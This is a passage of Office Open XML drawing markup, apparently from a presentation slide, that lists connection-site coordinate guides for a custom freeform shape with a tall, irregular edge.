              <a:gd name="connsiteY86" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY120" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255898 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 460893 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 434521 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3945686 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 463335 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 448810 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY120" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 460893 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4076008 h 6858000"/>
